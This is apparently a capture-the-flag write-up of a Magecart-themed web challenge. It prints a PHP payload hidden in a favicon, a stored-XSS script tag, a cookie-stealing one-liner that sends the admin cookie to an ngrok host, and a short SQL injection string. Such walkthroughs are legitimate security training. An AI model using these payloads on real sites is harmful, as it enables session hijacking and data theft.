# Level 4 - The Magician's Den

> One day, the admin of Apple Story Pte Ltd received an anonymous email.
>
> \===
>
> Dear admins of Apple Story, We are PALINDROME.
>
> We have took control over your system and stolen your secret formula!
>
> Do not fear for we are only after the money.
>
> Pay us our demand and we will be gone.
>
> For starters, we have denied all controls from you.
>
> We demand a ransom of 1 BTC to be sent to 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2 by 31 Dec 2021.
>
> Do not contact the police or seek for help.
>
> Failure to do so and the plant is gone.
>
> We planted a monitoring kit so do not test us.
>
> Remember 1 BTC by 31 dec 2021 and we will be gone. Muahahahaha.
>
> Regards, PALINDROME
>
> \===
>
> Management have just one instruction. Retrieve the encryption key before the deadline and solve this.
>
> <http://wp6p6avs8yncf6wuvdwnpq8lfdhyjjds.ctf.sg:14719>
>
> Note: Payloads uploaded will be deleted every 30 minutes.

### Finding the Target Server

From the challenge name and this photo, we could gather that this challenge was inspired by Magecart!

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-1830708c54cb74c080c74986cc4f858868356194%2FScreenshot%202021-11-19%20at%208.06.30%20PM.png?alt=media)

We were also hinted to look into Magecart's [past TTPs](https://www.darkreading.com/attacks-breaches/magecart-how-its-attack-techniques-evolved). I initially thought of card skimming JavaScript, but after taking a look at the page contents, this seemed rather unlikely (the only JavaScript was for the countdown timer).

This bit about Favicons was quite interesting, though, so I decided to look into it.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-103e1a3d29d9b05268b69fe14da2d771d2fb3c3f%2FScreenshot%202021-11-19%20at%208.10.46%20PM.png?alt=media)

It appears that the webpage's Favicon does indeed include some code!

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-6905215fcbfd3146659ebc0dd11d47989b514bc6%2F7ca9795e30414e18b9c16b8949f02c74.png?alt=media)

The base64 payload decodes to

```php
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,"http://s0pq6slfaunwbtmysg62yzmoddaw7ppj.ctf.sg:18926/xcvlosxgbtfcofovywbxdawregjbzqta.php");
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,"14c4b06b824ec593239362517f538b29=Hi%20from%20scada");
$server_output=curl_exec($ch);
```

We found a new endpoint, and we know that we can send POST requests to it!

### Authenticating as the Admin

Exploring a bit more, we can also find out the following:

1. When POST-ing data to the server, the data is saved to a HTML file.
2. `http://s0pq6slfaunwbtmysg62yzmoddaw7ppj.ctf.sg:18926/data.php` lists all the recent HTML files.
3. The files are read by the admin.
4. We can perform an XSS on the admin.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-1517497738291ac35dcd5d89953460f6eb908d6f%2F36e6f00685104e69993835240f25d59a.png?alt=media)

I sent the following HTML payload:

```html
Hi from scada
<script src="https://bf25-115-66-195-39.ngrok.io/exploit.js"></script>
```

On the exploit server, the following cookie stealing payload is hosted on `exploit.js`:

```javascript
document.location.href = "https://bf25-115-66-195-39.ngrok.io/?" + document.cookie;
```

This allows us to obtain the admin cookie.

### Getting the Flag

In the `robots.txt` file, we discover some interesting entries.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-0ef53f46b85a60b72cea4c7b2f9d94ec6d56afae%2Fdd681de414c94edb80ba81fd4bc853ac.png?alt=media)

The `login.php` endpoint redirects to `landing_admin.php` once we have authenticated as the admin. We also learnt that we can set `?debug=TRUE`.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-5dcbabd68010deeab38f0faa7e031b503e77a459%2F5d7bf7812d0a4de5ae5258056dee66b9.png?alt=media)

Here, we need to exploit an SQL injection to obtain the flag. The debug parameter helps us to see SQL errors! The challenge is that the filter can only be 7 characters long, so we have to get creative.

I ended up with `filter='or'1'#`. Spaces were not needed between strings, the `'1'` string evaluates to a boolean True, and the `#` comments out the rest of the query to prevent errors.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-6f0585583d206883f88d35960411bbdca7185c40%2Fcb977d0b27e74864b867b2a99f720931.png?alt=media)